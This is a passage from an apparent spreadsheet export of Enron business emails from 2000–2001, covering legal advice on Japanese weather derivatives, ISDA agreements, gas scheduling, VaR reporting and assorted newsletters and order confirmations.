law or regulation that might apply to derivatives in that country. _x000D_
_x000D_
 _x000D_
Although we are not able to state conclusively that Enron will have no risk in_x000D_
entering into weather derivatives in Japan, we consider that this risk will be_x000D_
reduced if _x000D_
a. Enron entered into these transactions from offshore ;_x000D_
b. Enron Japan is not involved in the marketing of these  transactions in any_x000D_
way;_x000D_
c. Enron obtains the representations below where the counterparties are _x000D_
Japanese_x000D_
residents.   _x000D_
_x000D_
Please answer the following questions if you are a Japanese entity:_x000D_
_x000D_
To ensure that this transaction does not fall within Article 185 or 186 of the_x000D_
Japanese Criminal Code, please confirm that:_x000D_
_x000D_
a. you have read and fully understand the terms of the proposed transaction;_x000D_
_x000D_
b. you are entering into this transaction to hedge weather related risk that_x000D_
arises in the ordinary course of your business. _x000D_
_x000D_
If your answers are affirmative for both a and b above, Enron will rely on _x000D_
these_x000D_
representations and regard your company as having a "legitimate business_x000D_
purpose" to enter into this transaction as permitted under Article 35 of the_x000D_
Criminal Code. _x000D_
_x000D_
As we mentioned above, while obtaining these representations could reduce the_x000D_
risk of Enron from contracting with inappropriate parties, it obviously would_x000D_
not catch inappropriate counterparties that knowingly answer the questions_x000D_
falsely.  Therefore, to the extent possible, Enron should also conduct its own_x000D_
due diligence with respect to the counterparty to confirm the suitability of _x000D_
the_x000D_
transaction and to confirm that the counterparty has a legitimate business_x000D_
purpose in entering into the transaction.  _x000D_
_x000D_
4. We confirm that there should be no transaction tax applicable to weather_x000D_
derivatives. _x000D_
_x000D_
5.  We confirmed with MITI that they are setting up a committee to draw up new_x000D_
regulations for derivative transactions for industrial commodities (not for_x000D_
weather) but they envisage that such regulations will not be ready for another_x000D_
year. _x000D_
_x000D_
Regards,_x000D_
_x000D_
PAD/AH_x000D_
in consultation with JDP/ST/TS_x000D_
_x000D_
-----Original Message-----_x000D_
From: John.Viverito@enron.com [ mailto:John.Viverito@enron.com_x000D_
&lt;mailto:John.Viverito@enron.com&gt; ]_x000D_
Sent: Tuesday, June 06, 2000 7:28 AM_x000D_
To: Paul.TYO.Davis@BakerNet.com; Anne.Hung@Bakernet.com_x000D_
Cc: David.Minns@enron.com; Alan.Aronowitz@enron.com_x000D_
Subject: ENRON Request for Further Advice_x000D_
_x000D_
_x000D_
_x000D_
Paul/Anne-_x000D_
_x000D_
The scheduled date for the launch of EOL weather trading in Australia is_x000D_
June 23rd.  We plan to trade Tokyo and Osaka in addition to Australian_x000D_
cities. Therefore, we need to have resolved all legal issues prior to this_x000D_
date.  Below, we provide some background information and a basic_x000D_
operational description of Enron Online, for your review._x000D_
_x000D_
We have also raised questions relating to this matter and look forward to_x000D_
your prompt response.  As similar questions have been asked and answered_x000D_
previously, we would hope to receive your responses by the end of this_x000D_
week._x000D_
_x000D_
Background_x000D_
_x000D_
1.   As you know, Enron Corp. has developed an online trading system using_x000D_
the internet for a number of physical products and financial derivatives_x000D_
which it or its subsidiaries trade.  This system is called Enron Online.  A_x000D_
preview of the system is available on the internet at www.enrononline.com_x000D_
_x000D_
2.   One category of product traded through EnronOnline is weather_x000D_
derivatives.  Although there are differing types of weather derivatives_x000D_
they all have a floating price linked to meteorological readings (e.g._x000D_
temperature, precipitation)._x000D_
_x000D_
3.   Enron proposes to offer weather derivatives linked to meteorological_x000D_
readings for Tokyo and Osaka (and potentially for other Japanese and_x000D_
foreign cities) to counterparties resident in Japan.  Initially the Enron_x000D_
contracting entity will be a wholly owned subsidiary of Enron Corp. that is_x000D_
incorporated in a country other than Japan and that has no presence in_x000D_
Japan.  Later, the Enron contracting entity may be a Japanese resident_x000D_
corporation (e.g. Enron Japan Corp.)._x000D_
_x000D_
4.   In your advice dated January 14, 2000 you generally indicated that_x000D_
there would be no legal impediment to Enron trading OTC weather derivatives_x000D_
in Japan.  We would ask that you expand on that advice._x000D_
_x000D_
_x000D_
Operation of EnronOnline_x000D_
_x000D_
_x000D_
1.   EnronOnline allows counterparties to may make on line offers to Enron_x000D_
in respect of one of the products listed on the screen. Enron may accept_x000D_
this offer through an on line response thereby forming a contract._x000D_
_x000D_
2.   A potential counterparty wishing to trade through EnronOnline contacts_x000D_
Enron and fills out a registration form. Enron will make its credit_x000D_
assessment on the counterparty. If accepted the counterparty is required to_x000D_
sign a password agreement and is issued a password._x000D_
_x000D_
3.   The first time a counterparty logs onto the system with its approved_x000D_
password it will be required to agree to an electronic trading Agreement_x000D_
(ETA) by clicking the "I Agree" Box after scrolling thought the ETA._x000D_
_x000D_
4.   For each traded product there will be available online a set of_x000D_
contract terms known as "General Terms and Conditions" (GTC).  The GTC is_x000D_
supplemented by a product description.  A draft product description for a_x000D_
weather derivative for a Japanese city is enclosed.  A sample GTC for an_x000D_
Australian weather derivative is also provided.  The GTCs for a Japanese_x000D_
city weather derivative would be similar but would reference Japanese_x000D_
weather stations._x000D_
_x000D_
5.   A counterparty transacts through EnronOnline by "clicking" and_x000D_
submitting an online offer to Enron.  The offer may or may not be accepted_x000D_
by Enron. The counterparty will receive notification that either the trade_x000D_
was successful or that their offer was not accepted. The ETA specifies that_x000D_
acceptance occurs when the Enron message hits the server._x000D_
_x000D_
Would you please advise on the following points._x000D_
_x000D_
1.   Please reconfirm your previous advice that there are no regulatory_x000D_
approvals required  to trade Japanese weather derivatives where the Enron_x000D_
counterparty is resident in   Japan. Would you please consider both the_x000D_
circumstance (i) where the Enron         contracting party to the weather_x000D_
derivative is neither incorporated nor resident in           Japan and (ii)_x000D_
where the Enron contracting party to the weather derivative is_x000D_
incorporated or resident in Japan._x000D_
_x000D_
2.    Do  any  of your conclusions in your previous advice that OTC weather_x000D_
   derivatives  can   be offered legally in Japan, whether based on weather_x000D_
   readings  for  Japanese locations       or foreign locations, need to be_x000D_
   modified if the OTC weather derivatives can be traded          via Enron_x000D_
   Online?_x000D_
_x000D_
3.    Any  impact  the  legislation  regulating  gambling may have on these_x000D_
   products._x000D_
_x000D_
4.    Please  reconfirm  that  there  would  not  be  any transaction taxes_x000D_
   applying to weather   derivatives._x000D_
_x000D_
5.    Any  other  material  legal  issues that you advise are applicable to_x000D_
   these types of        products._x000D_
_x000D_
We are also providing below, for your review, a sample swap product_x000D_
description and our General Terms and Conditions for Australia heating_x000D_
degree day swaps._x000D_
_x000D_
Best regards,_x000D_
_x000D_
John_x000D_
_x000D_
_x000D_
(See attached file: HDD Swap Osaka 000529.doc)(See attached file: GTC HDD_x000D_
Aust 000530.doc)_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 27 Nov 2001 10:31:06 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'customerservice.3750855.18932.569439@service.williams-sonoma.com'})</t>
  </si>
  <si>
    <t>Williams-Sonoma Order Confirmation</t>
  </si>
  <si>
    <t>Order #  013307830292 _x000D_
_x000D_
Dear Jeffrey Dasovich,_x000D_
_x000D_
Thank you for shopping with Williams-Sonoma.  We have received your order, and it is currently being processed.  Please see below for details:_x000D_
_x000D_
_x000D_
Ship to Name &amp; Address:_x000D_
_x000D_
Jeffrey Dasovich_x000D_
101 California St._x000D_
Suite 1950_x000D_
_x000D_
(For privacy reasons, the city, state and zip code have been omitted.)_x000D_
_x000D_
 _x000D_
  Item Description                     Item #       Qty      Price  Status        _x000D_
_x000D_
  Heirloom Tomato Bowls S/5            83-4006151    1      $49.00  Available for immediate shipping_x000D_
_x000D_
-------------------------------------------------------------------------------------------_x000D_
_x000D_
_x000D_
Merchandise Subtotal      $49.00_x000D_
Shipping Charge           $10.50_x000D_
_x000D_
Tax                        $4.04_x000D_
--------------------------------_x000D_
Total                     $63.54_x000D_
_x000D_
_x000D_
We will continue to email the status of your order as each item is shipped.  You can always review the status of your order at http://service.williams-sonoma.com/3750855.18932.569439.800.cs%2Findex.cfm%3Fbnrid%3D8300017._x000D_
Simply enter your order confirmation number and billing zip code to access the information._x000D_
If you ordered multiple items, some items may be shipped separately with no additional shipping charges._x000D_
	_x000D_
_x000D_
	_x000D_
Thank you for your order._x000D_
_x000D_
Williams-Sonoma Customer Service _x000D_
1.800.541.1262_x000D_
_x000D_
Weekdays, 7:00 a.m. to 5:00 p.m., Pacific time_x000D_
Saturday, 8:00 a.m. to 4:30 p.m., Pacific time_x000D_
_x000D_
		To visit us online, go to http://service.williams-sonoma.com/3750855.18932.569439.2255.%3Fbnrid%3D8300011</t>
  </si>
  <si>
    <t>Fri, 2 Nov 2001 11:44:43 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Adoption Agreement applicable to ISDA Masters</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Van Hooser, Steve  _x000D_
Sent:	Friday, November 02, 2001 9:20 AM_x000D_
To:	Koehler, Anne C.; Jones, Tana; McCullough, Travis; Murray, Julia; Sager, Elizabeth; Taylor, Mark E (Legal)_x000D_
Cc:	Korkmas, Deb; Nettelton, Marcus_x000D_
Subject:	Adoption Agreement applicable to ISDA Masters_x000D_
Importance:	High_x000D_
_x000D_
I have reviewed the attached draft with Anne, Travis and Marcus.  For purposes of maintaining consistency between the 3 disciplines, I would appreciate your using the attached for any further ISDA Adoption Agreements you may have.  Anne's suggested Item 7 to Scheule B should cut down your due diligence workload appreciably regaring the various places that Affiliate is used in the Master. _x000D_
_x000D_
The main change from the draft Anne sent out yesterday evening is that it "reinserts" the Schedule C with Credit information._x000D_
_x000D_
Please call with any question._x000D_
_x000D_
Steve_x000D_
  _x000D_
_x000D_
_x000D_
_x000D_
Steve Van Hooser_x000D_
Enron North America Corp._x000D_
713-853-7238_x000D_
713-646-3490 (fax)</t>
  </si>
  <si>
    <t>Wed, 6 Jun 2001 21:14:07 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'351020.36020686.1@listserv.redherring.com'})</t>
  </si>
  <si>
    <t>CATCH OF THE DAY: Ticket turbulence</t>
  </si>
  <si>
    <t xml:space="preserve">             Find these stories and more at_x000D_
               http://www.redherring.com_x000D_
_x000D_
------------------------------------------------------------_x000D_
TOP STORY: Now that market realities behind the Internet_x000D_
bubble have torn up portfolios, investors are looking for_x000D_
someone, anyone, to blame ... except themselves._x000D_
_x000D_
* Investor rage gets ugly_x000D_
  http://www.redherring.com/index.asp?layout=story&amp;channel=20000002&amp;doc_id=1270019527_x000D_
_x000D_
------------------------------------------------------------_x000D_
               A D V E R T I S E M E N T_x000D_
_x000D_
4 risk FREE issues of The Economist! Special offer for new_x000D_
subscribers! Join the ranks of those who demand unparalleled_x000D_
reporting and analysis week by week. Try The Economist_x000D_
today! Valid in US only. Click here:_x000D_
_x000D_
http://www.neodata.com/Economist/7wb/_x000D_
_x000D_
               A D V E R T I S E M E N T_x000D_
------------------------------------------------------------_x000D_
_x000D_
Catch of the Day: Ticket turbulence_x000D_
_x000D_
The FAA has been working for years on a new air traffic_x000D_
system called "Free Flight," in which pilots, using modern_x000D_
technology, would have direct control of their flight plans._x000D_
Advantages include flexibility, direct (cheaper) routing,_x000D_
and a reduced load on the air traffic control system._x000D_
_x000D_
Yet most passengers still aren't trusted to handle their own_x000D_
itineraries like grownups. They cannot transfer or resell_x000D_
tickets if plans change. This is partly because the airlines_x000D_
historically believe that transferable tickets would_x000D_
encourage speculation._x000D_
_x000D_
FairAir is trying to counter that with a plan right out of_x000D_
1999: the company is building a market for transferable_x000D_
airline tickets. FairAir wants to sell this service to_x000D_
airlines, which will then be able to market a class of_x000D_
tickets that are potentially refundable (if there are_x000D_
buyers). The for-sale tickets might show up on the airlines'_x000D_
sites, as well as auction and travel sites. CEO Frank Levy_x000D_
is convinced an aftermarket will drive up ticket prices on_x000D_
some routes. He also reminds me that most airlines lose_x000D_
money, so some experimentation wouldn't hurt._x000D_
_x000D_
Northwest Airlines is running a trial with FairAir tickets_x000D_
on some of its routes. Real success will depend on much_x000D_
broader adoption, however._x000D_
_x000D_
_x000D_
- Rafe Needleman, rafe-needleman@redherring.com_x000D_
  Editor, http://www.redherring.com_x000D_
_x000D_
_x000D_
COMPANIES_x000D_
* FairAir_x000D_
  http://www.fairair.com_x000D_
_x000D_
* Northwest Airlines_x000D_
  http://www.nwa.com_x000D_
_x000D_
* The FAA's Free Flight site_x000D_
  http://www.faa.gov/freeflight/_x000D_
_x000D_
* Priceline_x000D_
  http://www.priceline.com_x000D_
_x000D_
* Hotwire_x000D_
  http://www.hotwire.com_x000D_
_x000D_
* Expedia_x000D_
  http://www.expedia.com_x000D_
_x000D_
* Travelocity_x000D_
  http://www.travelocity.com_x000D_
_x000D_
* Orbitz_x000D_
  http://www.orbitz.com_x000D_
_x000D_
_x000D_
RELATED STORIES_x000D_
* Dealflow: FairAir got funding last August_x000D_
  http://www.redherring.com/story_redirect.asp?layout=story_generic&amp;doc_id=RH1950014395&amp;channel=40000004#b2b_x000D_
_x000D_
* Priceline's earnings take off_x000D_
  http://www.redherring.com/story_redirect.asp?layout=story_generic&amp;doc_id=RH280019228&amp;channel=20000002_x000D_
_x000D_
* Online travel takes off despite doom and gloom_x000D_
  http://www.redherring.com/story_redirect.asp?layout=story_generic&amp;doc_id=RH750019075&amp;channel=50000005_x000D_
_x000D_
* Eking out a future in e-commerce_x000D_
  http://www.redherring.com/story_redirect.asp?layout=story_generic&amp;doc_id=RH1050019305&amp;channel=20000002_x000D_
_x000D_
* Orbitz had a rough takeoff_x000D_
  http://www.redherring.com/index.asp?layout=story&amp;channel=50000005&amp;doc_id=330010633_x000D_
_x000D_
* Hotwire tails Priceline online_x000D_
  http://www.redherring.com/index.asp?layout=story&amp;channel=50000005&amp;doc_id=1360010536_x000D_
_x000D_
* United Air flying on the Web_x000D_
  http://www.redherring.com/index.asp?layout=story&amp;channel=50000005&amp;doc_id=70010407_x000D_
_x000D_
_x000D_
------------------------------------------------------------_x000D_
               A D V E R T I S E M E N T_x000D_
_x000D_
4 risk FREE issues of THE ECONOMIST! Special offer for new_x000D_
subscribers! Join the ranks of those who demand unparalleled_x000D_
reporting and analysis week by week. Try THE ECONOMIST_x000D_
today! Valid in US only. Click here:_x000D_
_x000D_
http://www.neodata.com/Economist/7wb/_x000D_
_x000D_
               A D V E R T I S E M E N T_x000D_
------------------------------------------------------------_x000D_
_x000D_
INVESTOR CENTER_x000D_
IBM is gearing up to pass the torch from its legendary CEO_x000D_
Lou Gerstner to longtime company loyalist Sam Palmisano. And_x000D_
investors could not care less._x000D_
_x000D_
* The new Big Blue_x000D_
  http://www.redherring.com/index.asp?layout=story&amp;channel=20000002&amp;doc_id=1260019526_x000D_
_x000D_
------------------------------------------------------------_x000D_
_x000D_
UPCOMING RED HERRING EVENTS_x000D_
_x000D_
Venture Market Europe_x000D_
June 11 - 12_x000D_
Hilton Park Lane_x000D_
London, UK_x000D_
_x000D_
Herring on Hollywood_x000D_
July 30-31_x000D_
Century Plaza Hotel_x000D_
Los Angeles CA_x000D_
_x000D_
Venture Market East_x000D_
Sept 25 - 26_x000D_
Fairmont Hotel_x000D_
Boston MA_x000D_
_x000D_
http://events.redherring.com/_x000D_
_x000D_
------------------------------------------------------------_x000D_
_x000D_
SPECIAL OFFER on RED HERRING magazine!_x000D_
_x000D_
Stay on the cutting edge of technology -- subscribe to Red_x000D_
Herring. By taking advantage of this special offer, you'll_x000D_
pay only $39 for a total of 24 issues and SAVE 67 percent_x000D_
off the cover price! New subscribers only, please._x000D_
_x000D_
http://www.redherring.com/index.asp?layout=magazine_us_subscrib_x000D_
_x000D_
------------------------------------------------------------_x000D_
_x000D_
ADVERTISING INFORMATION_x000D_
For information on advertising in Red Herring_x000D_
newsletters, contact: advertising@redherring.com_x000D_
_x000D_
------------------------------------------------------------_x000D_
_x000D_
You are currently subscribed to Catch of the Day with the_x000D_
address alewis@ect.enron.com. If you wish to unsubscribe,_x000D_
please go to_x000D_
http://www.redherring.com/index.asp?layout=e_newsletters,_x000D_
sign in using this exact address, and uncheck the_x000D_
newsletters you no longer want to receive._x000D_
_x000D_
------------------------------------------------------------_x000D_
_x000D_
Copyright (c) 2001 Red Herring Communications_x000D_
All rights reserved_x000D_
_x000D_
------------------------------------------------------------</t>
  </si>
  <si>
    <t>Fri, 27 Oct 2000 02:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'georgeanne.hodges@enron.com', 'jan.johnson@enron.com', 'sally.beck@enron.com', 'shona.wilson@enron.com'})</t>
  </si>
  <si>
    <t>SEC VaR</t>
  </si>
  <si>
    <t>The good news is that September VaRs are little changed from the June numbers._x000D_
_x000D_
The bad news is that the New Power Company went public in October.  The stock _x000D_
is very volatile (about 180% per year).  The warrants we inserted into the _x000D_
Hawaii 125-0 McGarret swaps are hugely in the money and will therefore have _x000D_
substantial VaR.   VaR for the total return swaps will probably be over $30 _x000D_
million in October.  _x000D_
Additionally, you will notice a huge trading commodities VaR for August ($79 _x000D_
million).  This will require some explanation when we report high monthly VaR _x000D_
at year-end._x000D_
_x000D_
Regards,_x000D_
_x000D_
_x000D_
_x000D_
Eugenio</t>
  </si>
  <si>
    <t>Mon, 24 Apr 2000 08:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kdestep@columbiaenergygroup.com', 'chris.germany@enron.com', 'block@columbiaenergygroup.com'})</t>
  </si>
  <si>
    <t>Re: COH Choice for 4/21 - PLEASE READ - WEEKEND SETUP</t>
  </si>
  <si>
    <t xml:space="preserve">Just got this clarified by Scott G., that this is not a special pricing but_x000D_
like any other contract. ENA will bill CES for both demand and commodity_x000D_
charges, ENA is billed by TCO for $0.01 demand and commodity and Aristech pays_x000D_
TCO the remaining demand._x000D_
_x000D_
_x000D_
_x000D_
 Jeffrey Porter_x000D_
 04/20/2000 03:53 PM_x000D_
_x000D_
_x000D_
To: Chris.Germany@enron.com_x000D_
cc: Joan.Veselack@enron.com, Kara Destephanis/CES/ColumbiaGas@COLUMBIAGAS,_x000D_
Robert.Allwein@enron.com, Joann.Collins@enron.com, Doug _x000D_
Kinney/CES/ColumbiaGas,_x000D_
John Whited/CES/ColumbiaGas@ColumbiaGas_x000D_
Subject: Re: COH Choice for 4/21 - PLEASE READ - WEEKEND SETUP_x000D_
_x000D_
Just a note that the bill from TCO goes to Aristech and CES pays Aristech for_x000D_
both demand and commodity. Any gas we buy from Enron should not include any_x000D_
commodity costs. Thanks JPP_x000D_
_x000D_
_x000D_
_x000D_
Joan.Veselack@enron.com on 04/20/2000 12:12:17 AM_x000D_
Please respond to Joan.Veselack@enron.com_x000D_
_x000D_
To: Kara Destephanis/CES/ColumbiaGas@COLUMBIAGAS_x000D_
cc: Chris.Germany@enron.com, Jeffrey Porter/CES/ColumbiaGas@COLUMBIAGAS,_x000D_
Robert.Allwein@enron.com, Joann.Collins@enron.com_x000D_
Subject: Re: COH Choice for 4/21 - PLEASE READ - WEEKEND SETUP_x000D_
_x000D_
_x000D_
Kara, because we are close on the SST's max MDQ, we are going to use some_x000D_
of Aristech's Capacity. Also, to be pro-active on the huge temperature_x000D_
swings that we have been seeing on the weekends, we are going to do a 50/50_x000D_
split with storage. Hopefully, this will prevent overrun charges and_x000D_
overdelivery gas. Cross our fingers!!!!!!!!!  This has been approved_x000D_
through Jeff Porter, the CES Choice God!!!!!_x000D_
_x000D_
Also Joann Collins is on call this weekend. Friday is an "unofficial_x000D_
holiday" for us. Joann will be in the office tomorrow morning to do Choice._x000D_
_x000D_
_x000D_
Contract Changes:_x000D_
_x000D_
7-1: 67693     11558_x000D_
     67829     5000 (aristech capacity)_x000D_
Total          16558_x000D_
_x000D_
7-5  67693     9693_x000D_
     67829     3527 (aristech capacity)_x000D_
Total          13220_x000D_
_x000D_
Thank you!!!!!!!!!!!!!!!!!!!!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 9 Mar 2001 06:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Hey - I just checked my E MAils for the day.  Sorry to hear about the _x000D_
interview with AEP.  I really am quite surprised.   Did Kayvon say why they _x000D_
didnt want to give you an interview?   I believe your thinking correctly , _x000D_
you need to seriously consider the Balitmore job.  And dont forget there is _x000D_
that possiblilty with AGL in Houston.  Correct?</t>
  </si>
  <si>
    <t>Wed, 24 Jan 2001 10:32:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'linda.willis@twcable.com'})</t>
  </si>
  <si>
    <t>ClickAtHome</t>
  </si>
  <si>
    <t xml:space="preserve">Thank you for choosing Time Warner Road Runner as your high-speed online_x000D_
provider.  After a search of our database your address was found to be_x000D_
non-serviceable at this time.  While our system does serve your zip code, your_x000D_
particular part of the zip code has not been upgraded.  We are adding you to a_x000D_
list of persons to contact when we have expanded our service area to reach _x000D_
you._x000D_
_x000D_
A card will be sent to the address where service was requested giving an_x000D_
approximate upgrade date.  The card includes a special offer of FREE_x000D_
installation and a FREE month of Road Runner service.  Please keep the card as_x000D_
this offer cannot be processed without it._x000D_
_x000D_
Thank you again for choosing Time Warner Road Runner and we look forward to_x000D_
serving you in the near future._x000D_
</t>
  </si>
  <si>
    <t>Fri, 27 Jul 2001 07:14:43 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'taperkin@southernco.com'})</t>
  </si>
  <si>
    <t>RE: Draft ISDA Master Agreements</t>
  </si>
  <si>
    <t xml:space="preserve">Here are the ISDA Schedules for Georgia Power, Mississippi Power, and_x000D_
Savannah Electric with our comments.  Please let me know when you are ready_x000D_
to discuss._x000D_
_x000D_
Todd Perkins_x000D_
Southern Company_x000D_
404-506-0655_x000D_
_x000D_
 &lt;&lt;Enron - Georgia ISDA Schedule.doc&gt;&gt;  &lt;&lt;Enron - Mississippi ISDA_x000D_
Schedule.doc&gt;&gt;  &lt;&lt;Enron - Savannah ISDA Schedule.doc&gt;&gt;_x000D_
_x000D_
&gt; -----Original Message-----_x000D_
&gt; From:	Heard, Marie [SMTP:Marie.Heard@enron.com]_x000D_
&gt; Sent:	Thursday, July 12, 2001 11:56 AM_x000D_
&gt; To:	taperkin@southernco.com_x000D_
&gt; Subject:	FW: Draft ISDA Master Agreements_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Hope this reaches you this time._x000D_
&gt;_x000D_
&gt; Marie_x000D_
&gt; &gt;  -----Original Message-----_x000D_
&gt; &gt; From: 	Heard, Marie_x000D_
&gt; &gt; Sent:	Wednesday, July 11, 2001 5:01 PM_x000D_
&gt; &gt; To:	'taperkin@southernco.com'_x000D_
&gt; &gt; Cc:	Espinoza, Veronica; Boyd, Samantha; Panus, Stephanie; Hendry,_x000D_
&gt; &gt; Brent_x000D_
&gt; &gt; Subject:	Draft ISDA Master Agreements_x000D_
&gt; &gt;_x000D_
&gt; &gt; Mr. Perkins:_x000D_
&gt; &gt;_x000D_
&gt; &gt; Pursuant to Veronica Espinoza's request, I am attaching the following_x000D_
&gt; &gt; for your review:_x000D_
&gt; &gt;_x000D_
&gt; &gt; 1.	Schedule to the ISDA Master Agreement and Paragraph 13 to the_x000D_
&gt; &gt; ISDA Credit Support Annex between Enron North America Corp. ("ENA")_x000D_
&gt; &gt; and Savannah Electric and Power Company._x000D_
&gt; &gt;_x000D_
&gt; &gt; 2.	Schedule to the ISDA Master Agreement and Paragraph 13 to the_x000D_
&gt; &gt; ISDA Credit Support Annex between ENA and Georgia Power Company._x000D_
&gt; &gt;_x000D_
&gt; &gt; 3.	Schedule to the ISDA Master Agreement and Paragraph 13 to the_x000D_
&gt; &gt; ISDA Credit Support Annex between ENA and Mississippi Power Company._x000D_
&gt; &gt;_x000D_
&gt; &gt; Please do not hesitate to contact either Brent Hendry, Senior Counsel_x000D_
&gt; &gt; at (713) 853-7124 (brent.hendry@enron.com) or me should you have any_x000D_
&gt; &gt; questions or comments.  We look forward to hearing your comments._x000D_
&gt; &gt;_x000D_
&gt; &gt; Marie Heard_x000D_
&gt; &gt; Senior Legal Specialist_x000D_
&gt; &gt; Enron North America Corp._x000D_
&gt; &gt; Phone:  (713) 853-3907_x000D_
&gt; &gt; Fax:  (713) 646-3490_x000D_
&gt; &gt; marie.heard@enron.com_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; 				 &lt;&lt;020ctr(savannah).doc&gt;&gt; 	 &lt;&lt;106_x000D_
&gt; &gt; ctr (Georgia Power Co).doc&gt;&gt; 	 &lt;&lt;153ctr(miss power).doc&gt;&gt;  &lt;&lt;_x000D_
&gt; File: 020ctr(savannah).doc &gt;&gt;  &lt;&lt; File: 106 ctr (Georgia Power Co).doc &gt;&gt;_x000D_
&gt; &lt;&lt; File: 153ctr(miss power).doc &gt;&gt;_x000D_
_x000D_
 - Enron - Georgia ISDA Schedule.doc _x000D_
 - Enron - Mississippi ISDA Schedule.doc _x000D_
 - Enron - Savannah ISDA Schedule.doc </t>
  </si>
  <si>
    <t>Tue, 24 Apr 2001 04:21:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Land Options - Estoppel language</t>
  </si>
  <si>
    <t xml:space="preserve">Sounds good to me, although we are likely to find different purchasers want _x000D_
other stuff as well.  Kinda like on the turbine stuff - each counterparty has _x000D_
wanted something different._x000D_
_x000D_
ckm_x000D_
_x000D_
_x000D_
From: Carlos Sole on 04/24/2001 11:18 AM_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Land Options - Estoppel language  _x000D_
_x000D_
A letter whereby a party agrees that in the event of a change of control of _x000D_
its counterparty, it will not use such change of control event as a basis for _x000D_
challenging the enforceability of the agreement that it has with the _x000D_
counterparty.  At least in our context this is what Fred means by estoppel _x000D_
letter.  He has a very good point that we should incorporate this concept _x000D_
into our further assurances clause in our option agreements._x000D_
_x000D_
Carlos Sole'_x000D_
Senior Counsel_x000D_
Enron North America Corp._x000D_
1400 Smith Street_x000D_
Houston, Texas 77002-7361_x000D_
_x000D_
(713) 345-8191 (phone)_x000D_
713 646-3393 (fax)_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 5 Apr 2001 16:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>tolling for Riverside Canal &amp; Mountainview power</t>
  </si>
  <si>
    <t>I just got your documents.  Call me.</t>
  </si>
  <si>
    <t>Tue, 26 Sep 2000 02:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Enron North American Peaker Facilities ('2000 &amp; '99) Safety Stats.</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Don Miller/HOU/ECT on 09/26/2000 09:25 AM _x000D_
---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Mitch Robinson @ ENRON                           09/25/2000 01:03 PM_x000D_
	_x000D_
_x000D_
To: Don Miller/HOU/ECT@ECT, Stuart Zisman/HOU/ECT@ECT_x000D_
cc: Richard Broussard/Corp/Enron@Enron _x000D_
Subject: Enron North American Peaker Facilities ('2000 &amp; '99) Safety Stats._x000D_
_x000D_
fyi._x000D_
---------------------- Forwarded by Mitch Robinson/Corp/Enron on 09/25/2000 _x000D_
01:05 PM ---------------------------_x000D_
_x000D_
_x000D_
Ross Newlin@ENRON_DEVELOPMENT_x000D_
09/25/2000 12:48 PM_x000D_
To: Mitch Robinson@Enron_x000D_
cc: Tom Callaghan/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
_x000D_
Subject: Enron North American Peaker Facilities ('2000 &amp; '99) Safety Stats._x000D_
_x000D_
Mitch,_x000D_
The attachments below indicate OEC/ENA safety records for calendar years 99' _x000D_
and 00', for your use in the data room if you see fit. Let me know if you _x000D_
need more on this topic._x000D_
Hard copy of Brownsville's annual EPA inspection will be forwarded under _x000D_
seperate cover today. Unfortunately, New Albany and Caledonia inspections' _x000D_
just occurred and we will not have hard copy for roughly 30 days. I will _x000D_
forward upon receipt._x000D_
Gus is currently expediting draft copies of all RATA test for your _x000D_
consideration to include in data room. I will forward upon receipt._x000D_
Anything else, let me know,_x000D_
Ross_x000D_
_x000D_
---------------------- Forwarded by Ross Newlin/ENRON_DEVELOPMENT on _x000D_
09/25/2000 12:53 PM ---------------------------_x000D_
_x000D_
_x000D_
Scott Watson_x000D_
09/22/2000 01:57 PM_x000D_
To: Ross Newlin/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc:  _x000D_
_x000D_
Subject: Enron North American Peaker Facilities ('2000 &amp; '99) Safety Stats._x000D_
_x000D_
Ross:_x000D_
_x000D_
As you requested._x000D_
_x000D_
_x000D_
_x000D_
Scott_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 15 Oct 2001 06:07:43 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mary.hannusch@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'hraitt@energy.state.ca.us'})</t>
  </si>
  <si>
    <t>Request for True-up calculations</t>
  </si>
  <si>
    <t>Heather,_x000D_
_x000D_
I am in receipt of a letter from you addressed to Richard Ring dated September 19, 2001.  Richard has asked me to verify the true-up calculation shown on the letter.  Therefore, will you please provide copies of the spreadsheets that show how you arrived at the calculation?  _x000D_
_x000D_
Thank you very much._x000D_
Mary Hannusch_x000D_
713-345-6173</t>
  </si>
  <si>
    <t>Wed, 2 May 2001 04:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: FW: Blue Dog Max - COs 1 and 2</t>
  </si>
  <si>
    <t xml:space="preserve">Kay_x000D_
_x000D_
Can I come up to your office some time today to pick up fax copies of the _x000D_
executed version of c/o #2?  I need to give copies to Global Finance and _x000D_
Accounting in order to get the invoice paid.  If it's easier, you can also _x000D_
fax them to me at x63037._x000D_
_x000D_
Thanks,_x000D_
Rebecca_x000D_
---------------------- Forwarded by Rebecca Walker/NA/Enron on 05/02/2001 _x000D_
11:48 AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
